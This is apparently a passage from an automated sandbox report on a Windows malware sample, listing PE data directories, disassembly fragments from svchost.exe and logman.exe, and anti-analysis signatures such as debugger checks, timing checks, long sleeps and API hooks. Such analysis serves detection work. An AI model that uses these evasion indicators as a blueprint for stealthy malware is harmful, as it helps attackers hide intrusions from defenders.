Source:	Binary string: svchost.pdbUGP source: logman.exe, 00000006.00000002.2944473496.000000000388C000.00000004.10000000.00040000.00000000.sdmp, logman.exe, 00000006.00000002.2942896581.0000000002DB4000.00000004.00000020.00020000.00000000.sdmp, cuwattsjDnLrZm.exe, 00000007.00000002.2944086698.00000000032BC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2563084436.000000001646C000.00000004.80000000.00040000.00000000.sdmp

Source: YKzxWyqI6Y.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: YKzxWyqI6Y.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: YKzxWyqI6Y.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: YKzxWyqI6Y.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: YKzxWyqI6Y.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00418093 pushfd ; retf D7C8h	1_2_004180FF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004162E5 push eax; ret	1_2_00416327
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004142AB push esp; ret	1_2_004142AC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004162B3 push eax; ret	1_2_00416327
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00403380 push eax; ret	1_2_00403382
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00414C85 pushad ; ret	1_2_00414C94
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0040CD5B push ebx; iretd	1_2_0040CD60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004085DC push eax; iretd	1_2_004085DF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B309AD push ecx; mov dword ptr [esp], ecx	1_2_03B309B6
Source: C:\Program Files (x86)\vbaFexXopvmaeQBlSFrwNrYADHopwkqdvQkXMcOVWB\cuwattsjDnLrZm.exe	Code function: 5_2_029502F4 push edx; retn 5E10h	5_2_02950327
Source: C:\Program Files (x86)\vbaFexXopvmaeQBlSFrwNrYADHopwkqdvQkXMcOVWB\cuwattsjDnLrZm.exe	Code function: 5_2_029466E1 push eax; iretd	5_2_029466E4
Source: C:\Program Files (x86)\vbaFexXopvmaeQBlSFrwNrYADHopwkqdvQkXMcOVWB\cuwattsjDnLrZm.exe	Code function: 5_2_0294AE60 push ebx; iretd	5_2_0294AE65
Source: C:\Program Files (x86)\vbaFexXopvmaeQBlSFrwNrYADHopwkqdvQkXMcOVWB\cuwattsjDnLrZm.exe	Code function: 5_2_029523B0 push esp; ret	5_2_029523B1
Source: C:\Program Files (x86)\vbaFexXopvmaeQBlSFrwNrYADHopwkqdvQkXMcOVWB\cuwattsjDnLrZm.exe	Code function: 5_2_029543B8 push eax; ret	5_2_0295442C
Source: C:\Program Files (x86)\vbaFexXopvmaeQBlSFrwNrYADHopwkqdvQkXMcOVWB\cuwattsjDnLrZm.exe	Code function: 5_2_029543EA push eax; ret	5_2_0295442C
Source: C:\Program Files (x86)\vbaFexXopvmaeQBlSFrwNrYADHopwkqdvQkXMcOVWB\cuwattsjDnLrZm.exe	Code function: 5_2_029454F2 pushfd ; ret	5_2_029454F3
Source: C:\Program Files (x86)\vbaFexXopvmaeQBlSFrwNrYADHopwkqdvQkXMcOVWB\cuwattsjDnLrZm.exe	Code function: 5_2_02952D8A pushad ; ret	5_2_02952D99
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_032909AD push ecx; mov dword ptr [esp], ecx	6_2_032909B6
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_02A75259 push eax; iretd	6_2_02A7525C
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_02A860D7 push esp; retf A76Eh	6_2_02A860BD
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_02A8C89F push eax; retf	6_2_02A8C8A0
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_02A799D8 push ebx; iretd	6_2_02A799DD
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_02A80F28 push esp; ret	6_2_02A80F29
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_02A82F30 push eax; ret	6_2_02A82FA4
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_02A8BCA6 pushfd ; ret	6_2_02A8BC62
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_02A8BC8F pushfd ; ret	6_2_02A8BC62
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_02A8BC55 pushfd ; ret	6_2_02A8BC62
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_02A84D10 pushfd ; retf D7C8h	6_2_02A84D7C
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_0315C23C push eax; iretd	6_2_0315C23D
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_03165282 push eax; ret	6_2_03165284
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_0315905A push ebx; retf	6_2_0315905B

Source: C:\Users\user\Desktop\YKzxWyqI6Y.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YKzxWyqI6Y.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\logman.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\logman.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\logman.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\logman.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\logman.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\YKzxWyqI6Y.exe	API/Special instruction interceptor: Address: 179403C
Source: C:\Windows\SysWOW64\logman.exe	API/Special instruction interceptor: Address: 7FFE2220D324
Source: C:\Windows\SysWOW64\logman.exe	API/Special instruction interceptor: Address: 7FFE2220D7E4
Source: C:\Windows\SysWOW64\logman.exe	API/Special instruction interceptor: Address: 7FFE2220D944
Source: C:\Windows\SysWOW64\logman.exe	API/Special instruction interceptor: Address: 7FFE2220D504
Source: C:\Windows\SysWOW64\logman.exe	API/Special instruction interceptor: Address: 7FFE2220D544
Source: C:\Windows\SysWOW64\logman.exe	API/Special instruction interceptor: Address: 7FFE2220D1E4
Source: C:\Windows\SysWOW64\logman.exe	API/Special instruction interceptor: Address: 7FFE22210154
Source: C:\Windows\SysWOW64\logman.exe	API/Special instruction interceptor: Address: 7FFE2220DA44

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 1_2_03BAD1C0 rdtsc

1_2_03BAD1C0

Source: C:\Windows\SysWOW64\logman.exe	Window / User API: threadDelayed 4334			Jump to behavior
Source: C:\Windows\SysWOW64\logman.exe	Window / User API: threadDelayed 5638			Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe	API coverage: 0.7 %
Source: C:\Windows\SysWOW64\logman.exe	API coverage: 3.1 %

Source: C:\Windows\SysWOW64\logman.exe TID: 7900	Thread sleep count: 4334 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\logman.exe TID: 7900	Thread sleep time: -8668000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\logman.exe TID: 7900	Thread sleep count: 5638 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\logman.exe TID: 7900	Thread sleep time: -11276000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\vbaFexXopvmaeQBlSFrwNrYADHopwkqdvQkXMcOVWB\cuwattsjDnLrZm.exe TID: 7924	Thread sleep time: -30000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\logman.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\logman.exe	Last function: Thread delayed

Source: C:\Windows\SysWOW64\logman.exe

Code function: 6_2_02A8CD00 FindFirstFileW,FindNextFileW,FindClose,

6_2_02A8CD00

Source: firefox.exe, 00000008.00000002.2564776654.0000020AD633E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll7
Source: logman.exe, 00000006.00000002.2942896581.0000000002DB4000.00000004.00000020.00020000.00000000.sdmp, cuwattsjDnLrZm.exe, 00000007.00000002.2943587344.000000000155F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\SysWOW64\svchost.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\logman.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 1_2_03BAD1C0 rdtsc

1_2_03BAD1C0

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 1_2_00418013 LdrLoadDll,

1_2_00418013

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B533A5 mov eax, dword ptr fs:[00000030h]	1_2_03B533A5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B633A0 mov eax, dword ptr fs:[00000030h]	1_2_03B633A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B633A0 mov eax, dword ptr fs:[00000030h]	1_2_03B633A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B8739A mov eax, dword ptr fs:[00000030h]	1_2_03B8739A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B8739A mov eax, dword ptr fs:[00000030h]	1_2_03B8739A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B28397 mov eax, dword ptr fs:[00000030h]	1_2_03B28397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B28397 mov eax, dword ptr fs:[00000030h]	1_2_03B28397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B28397 mov eax, dword ptr fs:[00000030h]	1_2_03B28397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B2E388 mov eax, dword ptr fs:[00000030h]	1_2_03B2E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B2E388 mov eax, dword ptr fs:[00000030h]	1_2_03B2E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B2E388 mov eax, dword ptr fs:[00000030h]	1_2_03B2E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B5438F mov eax, dword ptr fs:[00000030h]	1_2_03B5438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B5438F mov eax, dword ptr fs:[00000030h]	1_2_03B5438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C053FC mov eax, dword ptr fs:[00000030h]	1_2_03C053FC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B4E3F0 mov eax, dword ptr fs:[00000030h]	1_2_03B4E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B4E3F0 mov eax, dword ptr fs:[00000030h]	1_2_03B4E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B4E3F0 mov eax, dword ptr fs:[00000030h]	1_2_03B4E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B663FF mov eax, dword ptr fs:[00000030h]	1_2_03B663FF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BEF3E6 mov eax, dword ptr fs:[00000030h]	1_2_03BEF3E6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C0539D mov eax, dword ptr fs:[00000030h]	1_2_03C0539D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B403E9 mov eax, dword ptr fs:[00000030h]	1_2_03B403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B403E9 mov eax, dword ptr fs:[00000030h]	1_2_03B403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B403E9 mov eax, dword ptr fs:[00000030h]	1_2_03B403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B403E9 mov eax, dword ptr fs:[00000030h]	1_2_03B403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B403E9 mov eax, dword ptr fs:[00000030h]	1_2_03B403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B403E9 mov eax, dword ptr fs:[00000030h]	1_2_03B403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B403E9 mov eax, dword ptr fs:[00000030h]	1_2_03B403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B403E9 mov eax, dword ptr fs:[00000030h]	1_2_03B403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BEB3D0 mov ecx, dword ptr fs:[00000030h]	1_2_03BEB3D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BEC3CD mov eax, dword ptr fs:[00000030h]	1_2_03BEC3CD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]	1_2_03B3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]	1_2_03B3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]	1_2_03B3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]	1_2_03B3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]	1_2_03B3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]	1_2_03B3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B383C0 mov eax, dword ptr fs:[00000030h]	1_2_03B383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B383C0 mov eax, dword ptr fs:[00000030h]	1_2_03B383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B383C0 mov eax, dword ptr fs:[00000030h]	1_2_03B383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B383C0 mov eax, dword ptr fs:[00000030h]	1_2_03B383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB63C0 mov eax, dword ptr fs:[00000030h]	1_2_03BB63C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C05341 mov eax, dword ptr fs:[00000030h]	1_2_03C05341
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B27330 mov eax, dword ptr fs:[00000030h]	1_2_03B27330
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BF132D mov eax, dword ptr fs:[00000030h]	1_2_03BF132D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BF132D mov eax, dword ptr fs:[00000030h]	1_2_03BF132D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B5F32A mov eax, dword ptr fs:[00000030h]	1_2_03B5F32A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B2C310 mov ecx, dword ptr fs:[00000030h]	1_2_03B2C310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B50310 mov ecx, dword ptr fs:[00000030h]	1_2_03B50310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB930B mov eax, dword ptr fs:[00000030h]	1_2_03BB930B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB930B mov eax, dword ptr fs:[00000030h]	1_2_03BB930B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB930B mov eax, dword ptr fs:[00000030h]	1_2_03BB930B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B6A30B mov eax, dword ptr fs:[00000030h]	1_2_03B6A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B6A30B mov eax, dword ptr fs:[00000030h]	1_2_03B6A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B6A30B mov eax, dword ptr fs:[00000030h]	1_2_03B6A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BD437C mov eax, dword ptr fs:[00000030h]	1_2_03BD437C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B37370 mov eax, dword ptr fs:[00000030h]	1_2_03B37370
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B37370 mov eax, dword ptr fs:[00000030h]	1_2_03B37370
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B37370 mov eax, dword ptr fs:[00000030h]	1_2_03B37370
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BEF367 mov eax, dword ptr fs:[00000030h]	1_2_03BEF367
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B29353 mov eax, dword ptr fs:[00000030h]	1_2_03B29353
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B29353 mov eax, dword ptr fs:[00000030h]	1_2_03B29353
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB035C mov eax, dword ptr fs:[00000030h]	1_2_03BB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB035C mov eax, dword ptr fs:[00000030h]	1_2_03BB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB035C mov eax, dword ptr fs:[00000030h]	1_2_03BB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB035C mov ecx, dword ptr fs:[00000030h]	1_2_03BB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB035C mov eax, dword ptr fs:[00000030h]	1_2_03BB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB035C mov eax, dword ptr fs:[00000030h]	1_2_03BB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BFA352 mov eax, dword ptr fs:[00000030h]	1_2_03BFA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h]	1_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h]	1_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h]	1_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h]	1_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h]	1_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h]	1_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h]	1_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h]	1_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h]	1_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h]	1_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h]	1_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h]	1_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h]	1_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h]	1_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h]	1_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B2D34C mov eax, dword ptr fs:[00000030h]	1_2_03B2D34C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B2D34C mov eax, dword ptr fs:[00000030h]	1_2_03B2D34C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB92BC mov eax, dword ptr fs:[00000030h]	1_2_03BB92BC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB92BC mov eax, dword ptr fs:[00000030h]	1_2_03BB92BC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB92BC mov ecx, dword ptr fs:[00000030h]	1_2_03BB92BC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB92BC mov ecx, dword ptr fs:[00000030h]	1_2_03BB92BC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B402A0 mov eax, dword ptr fs:[00000030h]	1_2_03B402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B402A0 mov eax, dword ptr fs:[00000030h]	1_2_03B402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B452A0 mov eax, dword ptr fs:[00000030h]	1_2_03B452A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B452A0 mov eax, dword ptr fs:[00000030h]	1_2_03B452A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B452A0 mov eax, dword ptr fs:[00000030h]	1_2_03B452A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B452A0 mov eax, dword ptr fs:[00000030h]	1_2_03B452A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BF92A6 mov eax, dword ptr fs:[00000030h]	1_2_03BF92A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BF92A6 mov eax, dword ptr fs:[00000030h]	1_2_03BF92A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BF92A6 mov eax, dword ptr fs:[00000030h]	1_2_03BF92A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BF92A6 mov eax, dword ptr fs:[00000030h]	1_2_03BF92A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BC62A0 mov eax, dword ptr fs:[00000030h]	1_2_03BC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BC62A0 mov ecx, dword ptr fs:[00000030h]	1_2_03BC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BC62A0 mov eax, dword ptr fs:[00000030h]	1_2_03BC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BC62A0 mov eax, dword ptr fs:[00000030h]	1_2_03BC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BC62A0 mov eax, dword ptr fs:[00000030h]	1_2_03BC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BC62A0 mov eax, dword ptr fs:[00000030h]	1_2_03BC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BC72A0 mov eax, dword ptr fs:[00000030h]	1_2_03BC72A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BC72A0 mov eax, dword ptr fs:[00000030h]	1_2_03BC72A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C052E2 mov eax, dword ptr fs:[00000030h]	1_2_03C052E2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B6329E mov eax, dword ptr fs:[00000030h]	1_2_03B6329E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B6329E mov eax, dword ptr fs:[00000030h]	1_2_03B6329E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B6E284 mov eax, dword ptr fs:[00000030h]	1_2_03B6E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B6E284 mov eax, dword ptr fs:[00000030h]	1_2_03B6E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB0283 mov eax, dword ptr fs:[00000030h]	1_2_03BB0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB0283 mov eax, dword ptr fs:[00000030h]	1_2_03BB0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB0283 mov eax, dword ptr fs:[00000030h]	1_2_03BB0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C05283 mov eax, dword ptr fs:[00000030h]	1_2_03C05283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BEF2F8 mov eax, dword ptr fs:[00000030h]	1_2_03BEF2F8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B292FF mov eax, dword ptr fs:[00000030h]	1_2_03B292FF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BE12ED mov eax, dword ptr fs:[00000030h]	1_2_03BE12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BE12ED mov eax, dword ptr fs:[00000030h]	1_2_03BE12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BE12ED mov eax, dword ptr fs:[00000030h]	1_2_03BE12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BE12ED mov eax, dword ptr fs:[00000030h]	1_2_03BE12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BE12ED mov eax, dword ptr fs:[00000030h]	1_2_03BE12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BE12ED mov eax, dword ptr fs:[00000030h]	1_2_03BE12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BE12ED mov eax, dword ptr fs:[00000030h]	1_2_03BE12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BE12ED mov eax, dword ptr fs:[00000030h]	1_2_03BE12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BE12ED mov eax, dword ptr fs:[00000030h]	1_2_03BE12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BE12ED mov eax, dword ptr fs:[00000030h]	1_2_03BE12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BE12ED mov eax, dword ptr fs:[00000030h]	1_2_03BE12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BE12ED mov eax, dword ptr fs:[00000030h]	1_2_03BE12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BE12ED mov eax, dword ptr fs:[00000030h]	1_2_03BE12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BE12ED mov eax, dword ptr fs:[00000030h]	1_2_03BE12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B402E1 mov eax, dword ptr fs:[00000030h]	1_2_03B402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B402E1 mov eax, dword ptr fs:[00000030h]	1_2_03B402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B402E1 mov eax, dword ptr fs:[00000030h]	1_2_03B402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B2B2D3 mov eax, dword ptr fs:[00000030h]	1_2_03B2B2D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B2B2D3 mov eax, dword ptr fs:[00000030h]	1_2_03B2B2D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B2B2D3 mov eax, dword ptr fs:[00000030h]	1_2_03B2B2D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B5F2D0 mov eax, dword ptr fs:[00000030h]	1_2_03B5F2D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B5F2D0 mov eax, dword ptr fs:[00000030h]	1_2_03B5F2D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]	1_2_03B3A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]	1_2_03B3A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]	1_2_03B3A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]	1_2_03B3A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]	1_2_03B3A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B5B2C0 mov eax, dword ptr fs:[00000030h]	1_2_03B5B2C0
